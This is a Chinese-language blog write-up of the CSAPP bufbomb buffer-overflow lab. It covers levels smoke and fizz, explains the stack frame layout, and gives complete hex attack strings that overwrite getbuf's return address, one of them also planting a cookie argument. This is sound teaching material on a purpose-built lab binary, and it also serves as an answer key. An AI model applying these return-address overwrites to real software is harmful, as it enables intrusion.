完成这个实验大概花费一天半的时间,看了很多大佬的博客,也踩了很多的坑,于是打算写一篇博客重新梳理一下思路和过程,大概会有两篇博客吧。
CSAPP lab3 bufbomb-缓冲区溢出攻击实验(上)smoke fizz
CSAPP lab3 bufbomb-缓冲区溢出攻击实验(下)bang boom kaboom
lab3要我们做这样一件事情,修改一个正在运行程序的stack以达到预期的目的。具体的修改方式是这样的:程序定义了一个局部C风格字符串变量,注意局部变量是放在stack上面的,所以当初始化这个字符串为用户输入,而又没有边界检查的话,就会缓冲区溢出,那么就会破坏这个函数栈。
就像下面这个函数会破坏自己的函数栈:
#define NORMAL_BUFF_SIZE 32int getbuf() char buf[NORMAL_BUFF_SIZE]; Gets(buf); return 1;}
![\"\"](\"https://oscimg.oschina.net/oscnet/eb7bb8950fea02f0ee10caaa71e620f1e39.png\")
会破坏到什么程度呢?如果用户输入太大,那么就把saved ebp给覆盖掉了;再大一点,就把return address覆盖掉了…没错,这个lab的精髓就是要让我们的输入来覆盖return address达到return到代码的其它地方执行!!!
ESP(Extended Stack Pointer)为扩展栈指针寄存器,是指针寄存器的一种,用于存放函数栈顶指针。与之对应的是EBP(Extended Base Pointer),扩展基址指针寄存器,也被称为帧指针寄存器,用于存放函数栈底指针。
ESP为栈指针,用于指向栈的栈顶(下一个压入栈的活动记录的顶部),而EBP为帧指针,指向当前活动记录的底部 实验目的:通过缓冲区溢出攻击,使学生进一步理解IA-32函数调用规则和栈帧结构。
实验技能:需要使用objdump来反汇编目标程序,使用gdb单步跟踪调试机器代码,查看相关内存及寄存器内容,也需要学生掌握简单的IA32汇编程序编写方法。
实验要求:5个难度等级(0-4逐级递增)
级别0、Smoke(candle):构造攻击字符串作为目标程序输入,造成缓冲区溢出,使目标程序能够执行smoke函数。
级别1、Fizz(sparkler):构造攻击字符串作为目标程序输入,造成缓冲区溢出,使目标程序能够执行fizz函数;fizz函数含有一个参数(cookie值),构造的攻击字符串应能给定fizz函数正确的参数,使其判断成功。
级别2、Bang(firecracker):构造攻击字符串作为目标程序输入,造成缓冲区溢出,使目标程序能够执行bang函数;并且要篡改全局变量global_value为cookie值,使其判断成功。因此,需要在缓冲区中注入恶意代码篡改全局变量。
级别3、Boom(dynamite):前面的攻击都是使目标程序跳转到特定函数,进而利用exit函数结束目标程序运行。Boom要求攻击程序能够返回到原调用函数test继续执行,即要求攻击之后,还原对栈帧结构的破坏。
级别4、kaboom(Nitro):本攻击需要对目标程序连续攻击n=5次,但每次攻击,被攻击函数的栈帧内存地址都不同,也就是函数的栈帧位置每次运行时都不一样。因此,要想办法保证每次都能够正确复原原栈帧被破坏的状态,使程序每次都能够正确返回。
从这个等级的命名我们也能窥探到一些端倪,candle 蜡烛,sparkler 烟火,firecracker 爆竹,dynamite 火药,Nitro 硝化甘油这一套命名规则显然让我们想起来lab2的拆弹实验,可见级别越高威力必然也就越大。而另外一套命名规则显然是从效果来看的,Smoke 冒烟,Fizz 劈啪作响,Bang 怦然巨响,Boom 隆隆作响,kaboom 大炸裂,果然有点意思。
本实验的数据包含于一个文件夹buflab-handout.tar中。下载该文件到本地目录中,然后利用“tar –xvf buflab-handout.tar”命令将其解压。
bufbomb:实验需要攻击的目标程序bufbomb。
bufbomb.c:目标程序bufbomb的主源程序。本校的实验中没有给出,但老师给的ppt上有。
makecookie:该程序基于你的学号产生一个唯一的由8个16进制数字组成的4字节序列(例如0x5f405c9a),称为“cookie”。
hex2raw:构建的攻击字符串中可能包含不可打印字符,很难通过键盘输入,提交结果时,一般将结果放置在一个答案txt文件中(攻击字符串以可显示的16进制形式存储),在输入给bufbomb之前,需要使用hex2raw将其转换成原始的(raw)数据。
其中结果提交和验证时,均需要使用到bufbomb,其使用方法(-h查看帮助):
![\"\"](\"https://oscimg.oschina.net/oscnet/157265721ca111ccc962fa77a6d1bc16d7a.png\")
h:查看帮助;
u:学生标识;-u要求我们输入一个唯一的userid,根据不同的userid生成不同的cookie值,这里我使用的userid是stu
n:对于级别4(nitro/kaboom),需要加此参数,被坑了很久,一定要加上此参数!!
s:验证正确性的同时,将结果提交到服务器(如果验证正确);
使用objdump -d命令将其反汇编到bufbomb.asm。
objdump -d bufbomb bufbomb.asm
使用makecookie,生成用户的Cookie,后面解题都要用到这个Cookie:![\"\"](\"https://oscimg.oschina.net/oscnet/581893ca3d7fb18a68d9b6d27ce2dcad618.png\")
攻击test()下getbuf()
![\"\"](\"https://img2018.cnblogs.com/blog/1358881/201905/1358881-20190504190610875-294198975.png\")
循环调用5次,
攻击testn() 下getbufn()
![\"\"](\"https://oscimg.oschina.net/oscnet/5ae3818d5104752f05a0007efc8ce3fbd60.png\")
构造攻击字符串作为目标程序输入,造成缓冲区溢出,使目标程序能够执行smoke函数。
源码:
#define NORMAL_BUFFER_SIZE 32void test() int val; /* Put canary on stack to detect possiblecorruption */ volatile int local = uniqueval(); val = getbuf(); /* Check for corruption stack */ if (local != uniqueval()) printf(\"Sabotaged!: the stack has beencorrupted\\n\"); else if (val == cookie) printf(\"Boom!: getbuf returned0x%x\\n\", val); validate(3); else printf(\"Dud: getbuf returned0x%x\\n\", val);int getbuf() char buf[NORMAL_BUFFER_SIZE]; Gets(buf); return 1;//Smoke源码:void smoke() puts(\"Smoke!: You calledsmoke()\"); validate(0); exit(0);}
我们的目标是调用上面的getbuf()以后,不正常返回,而是跳掉smoke这个函数的地方执行。
先看一下smoke的反汇编代码:
smoke函数的地址:0x8048c28
![\"\"](\"https://oscimg.oschina.net/oscnet/0c6cf630c8a86831538e78803577a7763e2.png\")
getbuf函数对应的栈还是上面那个栈的图:
![\"\"](\"https://oscimg.oschina.net/oscnet/aa82d19100a2ef7553f4c26171714ef1d65.png\")
buf只有0x28字节长度。
接下来,只要构造0x28(buf)+4(ebp)+4(return address)=48字节长度的字节码就可以将返回地址覆盖,最后四个字节的内容放smoke函数的地址保证返回地址是被smoke函数的地址覆盖,因为是小端存储(是指数据的高字节保存在内存的高地址中,而数据的低字节保存在内存的低地址中),也就是:28 8c 04 08,前面44个字节任意这里我放一些00。
也就是:
00 00 00 00 00 00 00 00 00 0000 00 00 00 00 00 00 00 00 0000 00 00 00 00 00 00 00 00 0000 00 00 00 00 00 00 00 00 0000 00 00 0028 8c 04 08
将其保存到一个txt文件中,用管道输入,通过hex2raw之后输入bufbomb程序。
![\"\"](\"https://oscimg.oschina.net/oscnet/bd08c84a6d6ae8f57bdd7878221803fe7c6.png\")
完成!
第1关:fizz构造攻击字符串作为目标程序输入,造成缓冲区溢出,使目标程序能够执行fizz函数;fizz函数含有一个参数(cookie值),构造的攻击字符串应能给定fizz函数正确的参数,使其判断成功。
还是上面的test函数和getbuf函数,这里就给出fizz源码:
void fizz(int val) if (val == cookie) printf(\"Fizz!: You called fizz(0x%x)\\n\", val); validate(1); else printf(\"Misfire: You called fizz(0x%x)\\n\", val); exit(0);}
这一关和第0关类似,最大的区别是这次要跳到fizz这个函数有个参数,我们在输入里需要伪造出函数的参数。
先看一下fizz的反汇编代码:
fizz函数的地址:0x08048c52 即( 52 8c 04 08)
![\"\"](\"https://oscimg.oschina.net/oscnet/35d472084ba2f3d455322dcaaeb0b1e572e.png\")
在fizz函数代码里有这样两句:
mov 0x8(%ebp),%eax cmp 0x804d108,%eax
其中0x8(%ebp)就是函数的第一个参数,而0x804d108这个内存地址保存着cookie的值,然后这两个值期望是一样的,这个位置就是我们要放cookie的位置。也就是说参数是放到了返回地址的上面,并且和返回地址相邻。同第0关一样,先用fizz函数地址覆盖掉getbuf返回地址,可以执行fizz函数,并且要将fizz函数的返回地址覆盖掉,并用cookie覆盖掉上面的参数。这样就可以跳转到fizz函数,并且在跳转后自己取到cookie作为参数,fizz函数的返回地址可以用任意四个字节的数覆盖,这里00 00 00 00覆盖掉,其作用只是用来占位。
也就是:
00 00 00 00 00 00 00 00 00 0000 00 00 00 00 00 00 00 00 0000 00 00 00 00 00 00 00 00 0000 00 00 00 00 00 00 00 00 0000 00 00 0052 8c 04 08 /*fizz 函数地址*/00 00 00 00/*fizz return address */94 25 80 4f /*Cookie: 0x4f802594*/
将其保存到一个txt文件中,用管道输入,通过hex2raw之后输入bufbomb程序。
![\"\"](\"https://oscimg.oschina.net/oscnet/6f5110472dd53d260cd30669f13ca705073.png\")
完成!
CSAPP lab3 bufbomb-缓冲区溢出攻击实验(下)bang boom kaboom
本文链接: http://fizzlab.immuno-online.com/view-725279.html
